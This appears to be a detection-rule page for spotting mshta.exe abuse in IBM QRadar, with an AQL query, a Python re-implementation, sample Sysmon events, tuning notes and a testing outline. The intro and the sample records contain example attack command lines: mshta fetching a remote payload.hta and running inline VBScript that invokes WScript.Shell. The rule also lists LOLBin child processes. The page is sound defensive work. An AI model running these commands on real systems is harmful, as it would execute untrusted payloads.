Detect Mshta in IBM QRadar
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files, JavaScript or VBScript through a trusted Windows utility. mshta.exe executes Microsoft HTML Application (HTA) files outside the Internet Explorer browser security context, bypassing browser security settings and application control solutions. HTA files can be loaded locally, from remote URLs (mshta http://server/payload.hta), or as inline scripts (mshta vbscript:...). This technique is widely used by nation-state APTs including FIN7, Lazarus Group, APT29, APT32, MuddyWater, Kimsuky, Sidewinder, Gamaredon, and many others, making it one of the most commonly abused LOLBins for initial access and execution.
MITRE ATT&CK
- Tactic: Defense Evasion
- Technique: T1218 System Binary Proxy Execution
- Sub-technique: T1218.005 Mshta
- Canonical reference: https://attack.mitre.org/techniques/T1218/005/
QRadar Detection Query
```sql
SELECT
    DATEFORMAT(deviceTime, 'yyyy-MM-dd HH:mm:ss') AS "Event Time",
    LOGSOURCENAME(logsourceid) AS "Log Source",
    sourceip AS "Source IP",
    username AS "User",
    "Image" AS "Process Path",
    "CommandLine" AS "Command Line",
    "ParentImage" AS "Parent Process",
    "ParentCommandLine" AS "Parent Command Line",
    CASE WHEN LOWER("CommandLine") LIKE '%http://%' OR LOWER("CommandLine") LIKE '%https://%' THEN 1 ELSE 0 END AS "RemoteURL",
    CASE WHEN LOWER("CommandLine") LIKE '%vbscript:%' OR LOWER("CommandLine") LIKE '%javascript:%' THEN 1 ELSE 0 END AS "InlineScript",
    CASE WHEN LOWER("CommandLine") LIKE '%getobject%' THEN 1 ELSE 0 END AS "GetObject",
    CASE WHEN LOWER("CommandLine") LIKE '%wscript.shell%' OR LOWER("CommandLine") LIKE '%shell.application%' OR LOWER("CommandLine") LIKE '%createobject%' OR LOWER("CommandLine") LIKE '%activexobject%' THEN 1 ELSE 0 END AS "ShellInvoke",
    CASE WHEN LOWER("ParentImage") LIKE '%winword.exe%' OR LOWER("ParentImage") LIKE '%excel.exe%' OR LOWER("ParentImage") LIKE '%outlook.exe%' OR LOWER("ParentImage") LIKE '%powerpnt.exe%' THEN 1 ELSE 0 END AS "OfficeParent",
    CASE WHEN LOWER("CommandLine") LIKE '%temp%' OR LOWER("CommandLine") LIKE '%appdata%' OR LOWER("CommandLine") LIKE '%downloads%' OR LOWER("CommandLine") LIKE '%desktop%' OR LOWER("CommandLine") LIKE '%public%' THEN 1 ELSE 0 END AS "HTAPath",
    CASE WHEN LOWER("ParentImage") LIKE '%\mshta.exe' AND (LOWER("Image") LIKE '%\cmd.exe' OR LOWER("Image") LIKE '%\powershell.exe' OR LOWER("Image") LIKE '%\wscript.exe' OR LOWER("Image") LIKE '%\cscript.exe' OR LOWER("Image") LIKE '%\certutil.exe' OR LOWER("Image") LIKE '%\bitsadmin.exe' OR LOWER("Image") LIKE '%\regsvr32.exe' OR LOWER("Image") LIKE '%\rundll32.exe') THEN 1 ELSE 0 END AS "SuspiciousChild"
FROM events
WHERE LOGSOURCETYPENAME(devicetype) IN ('Microsoft Windows Security Event Log', 'Sysmon')
  AND deviceTime > NOW() - 86400000
  AND (LOWER("Image") LIKE '%\mshta.exe' OR LOWER("ParentImage") LIKE '%\mshta.exe')
  AND (
    LOWER("CommandLine") LIKE '%http://%' OR
    LOWER("CommandLine") LIKE '%https://%' OR
    LOWER("CommandLine") LIKE '%vbscript:%' OR
    LOWER("CommandLine") LIKE '%javascript:%' OR
    LOWER("CommandLine") LIKE '%getobject%' OR
    LOWER("CommandLine") LIKE '%wscript.shell%' OR
    LOWER("CommandLine") LIKE '%shell.application%' OR
    LOWER("CommandLine") LIKE '%createobject%' OR
    LOWER("CommandLine") LIKE '%activexobject%' OR
    LOWER("ParentImage") LIKE '%winword.exe%' OR
    LOWER("ParentImage") LIKE '%excel.exe%' OR
    LOWER("ParentImage") LIKE '%outlook.exe%' OR
    LOWER("ParentImage") LIKE '%powerpnt.exe%' OR
    LOWER("ParentImage") LIKE '%\mshta.exe'
  )
ORDER BY deviceTime DESC
LAST 24 HOURS
```

QRadar AQL query detecting T1218.005 mshta.exe abuse. It queries Windows Security and Sysmon process-creation records from the events table, filters on Image or ParentImage matching mshta.exe, then scores each row across seven risk indicators (RemoteURL, InlineScript, GetObject, ShellInvoke, OfficeParent, HTAPath, SuspiciousChild). A row is returned only when at least one of the command-line or Office-parent indicators fires, or when mshta.exe is the parent process; HTAPath is scoring context for triage rather than a filter condition, and SuspiciousChild is implied by the parent-process branch. All evidence columns are preserved for triage. Every string match is wrapped in LOWER() because AQL LIKE is case-sensitive, so a command line using createobject or GETOBJECT scores the same as the mixed-case form.
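To check the indicator logic offline before pushing the rule into QRadar, here is a Python re-implementation of the query's CASE columns and WHERE clause. This is an added example, not code from the original page or from IBM; the Sysmon records it scores are constructed and modelled on the three Atomic tests described under Testing Methodology.

```python
"""Python re-implementation of the AQL indicator columns and WHERE clause. Added
example, not code from the original page; all matches are case-insensitive here."""

REMOTE_URL = ("http://", "https://")            # tuples mirror the AQL CASE expressions
INLINE_SCRIPT = ("vbscript:", "javascript:")
SHELL_INVOKE = ("wscript.shell", "shell.application", "createobject", "activexobject")
OFFICE_PARENT = ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe")
WRITABLE_PATH = ("temp", "appdata", "downloads", "desktop", "public")  # broad: also hits "template"
SUSPICIOUS_CHILD = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                    "certutil.exe", "bitsadmin.exe", "regsvr32.exe", "rundll32.exe")

def _any(haystack, needles):
    return int(any(n in haystack for n in needles))

def score(event):
    """Return the seven 0/1 indicators for one Sysmon Event ID 1 record."""
    cmd = event.get("CommandLine", "").lower()
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    return {
        "RemoteURL": _any(cmd, REMOTE_URL),
        "InlineScript": _any(cmd, INLINE_SCRIPT),
        "GetObject": int("getobject" in cmd),
        "ShellInvoke": _any(cmd, SHELL_INVOKE),
        "OfficeParent": _any(parent, OFFICE_PARENT),
        "HTAPath": _any(cmd, WRITABLE_PATH),
        "SuspiciousChild": int(parent.endswith("\\mshta.exe")
                               and any(image.endswith("\\" + c) for c in SUSPICIOUS_CHILD)),
    }

def matches(event):
    """WHERE clause of the query; note that HTAPath alone never selects a row."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    if parent.endswith("\\mshta.exe"):
        return True
    s = score(event)
    return image.endswith("\\mshta.exe") and bool(s["RemoteURL"] or s["InlineScript"]
                                                 or s["GetObject"] or s["ShellInvoke"] or s["OfficeParent"])

SAMPLE_EVENTS = [  # constructed records, not real telemetry: Tests 1-3 plus a benign local HTA
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta.exe http://127.0.0.1:8080/payload.hta"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"cmd.exe /c echo test > %TEMP%\out.txt"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Office16\WINWORD.EXE",
     "CommandLine": 'mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"")")'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\ui.hta"'},
]
```

Running `[score(e) for e in SAMPLE_EVENTS if matches(e)]` shows the first three records selected with the indicators each test is expected to trigger, while the local vendor HTA is dropped by the WHERE clause.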
False Positives & Tuning
- Enterprise middleware or ERP applications (e.g. SAP GUI, legacy Oracle Forms wrappers) that use HTA scaffolding and call COM objects such as Shell.Application for file-open dialogs or CreateObject for data exchange; these score highly on ShellInvoke despite being benign
- Software deployment tooling that stages HTA installer UIs into %APPDATA% or %TEMP% as part of a sanctioned software delivery pipeline, triggering the HTAPath indicator
- Penetration testing or red team exercises with explicit authorisation that use mshta.exe as a test vector; confirm against change management records before escalating
Testing Methodology
Validate this detection against three Atomic Red Team tests for this technique. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Mshta Remote HTA Execution
  Expected signal: Sysmon Event ID 1: mshta.exe with a URL in the command line. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080. Sysmon Event ID 22 (DNS query) if a domain was used instead of an IP. Security Event ID 4688.
- Test 2: Mshta Inline VBScript Execution
  Expected signal: Sysmon Event ID 1: mshta.exe with 'vbscript:' and 'CreateObject' in the command line. Sysmon Event ID 1: cmd.exe as a child of mshta.exe. Sysmon Event ID 11: file created at a temp path. Security Event ID 4688 for both processes.
- Test 3: Mshta Launched from Office Application Path
  Expected signal: Sysmon Event ID 1: cmd.exe, then mshta.exe with 'vbscript:' and 'Execute' in the command line. The InlineScript and GetObject/ShellInvoke indicators fire. If the obfuscated CreateObject resolves, a WScript.Shell child process spawns calc.exe as a grandchild of mshta.exe.
References
- https://attack.mitre.org/techniques/T1218/005/
- https://lolbas-project.github.io/lolbas/Binaries/Mshta/
- https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/
- https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md
- https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
- https://msdn.microsoft.com/library/ms536471.aspx